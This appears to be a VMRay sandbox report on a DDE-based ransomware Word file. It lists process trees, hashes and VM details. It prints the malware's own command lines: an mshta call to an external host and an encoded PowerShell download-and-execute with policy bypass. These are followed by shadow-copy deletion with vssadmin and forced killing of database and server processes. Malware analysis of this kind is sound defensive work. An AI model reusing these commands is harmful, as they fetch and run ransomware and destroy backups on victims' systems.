DDE Ransomware in a Macro-less Word document | VMRay Analyzer Report
Try VMRay Analyzer
Analysis Information
Creation Time 2017-10-16 16:26 (UTC+2)
VM Analysis Duration Time 00:02:37
Execution Successful True
Sample Filename DDEv2.docx
Command Line Parameters False
Prescript False
Number of Processes 41
Termination Reason Timeout
Reputation Enabled True
Download Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 27
VTI Rule Type Documents
Tags
#DDE #Ransomware #Macro_less
Remarks
Critical The operating system was rebooted during the analysis.
Critical The overall sleep time of all monitored processes was truncated from 10.51 milliseconds to 1.0 milliseconds to reveal dormant functionality.
Screenshots
Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot
Monitored Processes
Process Graph


ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8d4 Analysis Target Medium winword.exe "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
#2 0x9c0 Child Process Medium mshta.exe C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe http://w-szczecin.pl/img2/NEW15_10.doc/index.hta #1
#4 0xa28 Child Process Medium cmd.exe "C:\Windows\system32\cmd.exe" "/c powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwBzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA " #2
#5 0xa40 Child Process Medium powershell.exe powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwBzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA " #4
#6 0xa6c Child Process Medium powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command #5
#7 0xa90 Child Process Medium nvss.exe "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe" #5
#8 0xad4 Child Process Medium cmd.exe "C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet #7
#10 0xbb0 Child Process Medium cmd.exe cmd /c ""C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat"" #7
#11 0xbc4 Child Process Medium taskkill.exe TASKKILL /F /IM ApacheMonitor.exe /IM ApacheMonitor.exe #10
#13 0x668 Child Process Medium taskkill.exe TASKKILL /F /IM armsvc.exe /IM armsvc.exe #10
#14 0x838 Child Process Medium taskkill.exe TASKKILL /F /IM BackOffice.exe /IM BackOffice.exe #10
#15 0x8f0 Child Process Medium taskkill.exe TASKKILL /F /IM CodeMeter.exe /IM CodeMeter.exe #10
#16 0x948 Child Process Medium taskkill.exe TASKKILL /F /IM fbserver.exe /IM fbserver.exe #10
#17 0x82c Child Process Medium taskkill.exe TASKKILL /F /IM fdhost.exe /IM fdhost.exe #10
#18 0x87c Child Process Medium taskkill.exe TASKKILL /F /IM fdlauncher.exe /IM fdlauncher.exe #10
#19 0x8b4 Child Process Medium taskkill.exe TASKKILL /F /IM GLDS.exe /IM GLDS.exe #10
#20 0x83c Child Process Medium taskkill.exe TASKKILL /F /IM grym.exe /IM grym.exe #10
#21 0x114 Child Process Medium taskkill.exe TASKKILL /F /IM httpd.exe /IM httpd.exe #10
#22 0x148 Child Process Medium taskkill.exe TASKKILL /F /IM igfxCUIService.exe /IM igfxCUIService.exe #10
#23 0x108 Child Process Medium taskkill.exe TASKKILL /F /IM iikoNet.Pos.WinService.exe /IM iikoNet.Pos.WinService.exe #10
#24 0x9ac Child Process Medium taskkill.exe TASKKILL /F /IM mdm.exe /IM mdm.exe #10
#25 0xa0c Child Process Medium taskkill.exe TASKKILL /F /IM MsDtsSrvr.exe /IM MsDtsSrvr.exe #10
#26 0xa18 Child Process Medium taskkill.exe TASKKILL /F /IM msmdsrv.exe /IM msmdsrv.exe #10
#27 0x16c Child Process Medium taskkill.exe TASKKILL /F /IM MSSQLSERVER.exe /IM MSSQLSERVER.exe #10
#28 0xfc Child Process Medium taskkill.exe TASKKILL /F /IM oktell.ClientStarter4.exe /IM oktell.ClientStarter4.exe #10
#29 0x584 Child Process Medium taskkill.exe TASKKILL /F /IM oktell.HALMixerApp.exe /IM oktell.HALMixerApp.exe #10
#30 0xa24 Child Process Medium taskkill.exe TASKKILL /F /IM OSPPSVC.exe /IM OSPPSVC.exe #10
#31 0xa78 Child Process Medium taskkill.exe TASKKILL /F /IM PresentationFontCache.exe /IM PresentationFontCache.exe #10
#32 0xa9c Child Process Medium taskkill.exe TASKKILL /F /IM SQL Server.exe /IM SQL Server.exe #10
#33 0xa44 Child Process Medium taskkill.exe TASKKILL /F /IM SQLAGENT.exe /IM SQLAGENT.exe #10
#34 0xa8c Child Process Medium taskkill.exe TASKKILL /F /IM sqlbrowser.exe /IM sqlbrowser.exe #10
#35 0xa38 Child Process Medium taskkill.exe TASKKILL /F /IM sqlservr.exe /IM sqlservr.exe #10
#36 0x604 Child Process Medium taskkill.exe TASKKILL /F /IM sqlwriter.exe /IM sqlwriter.exe #10
#37 0x7b0 Child Process Medium taskkill.exe TASKKILL /F /IM srvany.exe /IM srvany.exe #10
#38 0xbd8 Child Process Medium taskkill.exe TASKKILL /F /IM tomcat7.exe /IM tomcat7.exe #10
#39 0x61c Child Process Medium taskkill.exe TASKKILL /F /IM tomcat7_x64.exe /IM tomcat7_x64.exe #10
#40 0x8e4 Child Process Medium taskkill.exe TASKKILL /F /IM torgsoft.exe /IM torgsoft.exe #10
#41 0x8dc Child Process Medium taskkill.exe TASKKILL /F /IM TSAppServer.exe /IM TSAppServer.exe #10
#42 0x8f0 Child Process Medium taskkill.exe TASKKILL /F /IM p2.exe /IM p2.exe #10
#43 0x82c Child Process Medium taskkill.exe TASKKILL /F /IM taskmgr.exe /IM taskmgr.exe #10
#44 0x87c Child Process Medium vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet #10
Sample Information
ID #19692
MD5 Hash Value 5786dbcbe1959b2978e979bf1c5cb450
SHA1 Hash Value 0dd5a58e89036beaa7a63c9f5541bf1402c9c4d4
SHA256 Hash Value bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9
Filename DDEv2.docx
File Size 21.50 KB (22016 bytes)
File Type Word Document
Has VBA Macros False
Analyzer and Virtual Machine Information
Analyzer Version 2.2.0
Analyzer Build Date 2017-09-28 17:24
Microsoft Office Version 2007
Microsoft Word Version 12.0.4518.1014
Internet Explorer Version 8.0.7601.17514
Chrome Version 59.0.3071.104
Firefox Version 25.0
Flash Version 10.3.183.86
Java Version 7.0.550
VM Name win7_64_sp1-mso2007
VM Architecture x86 64-bit
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image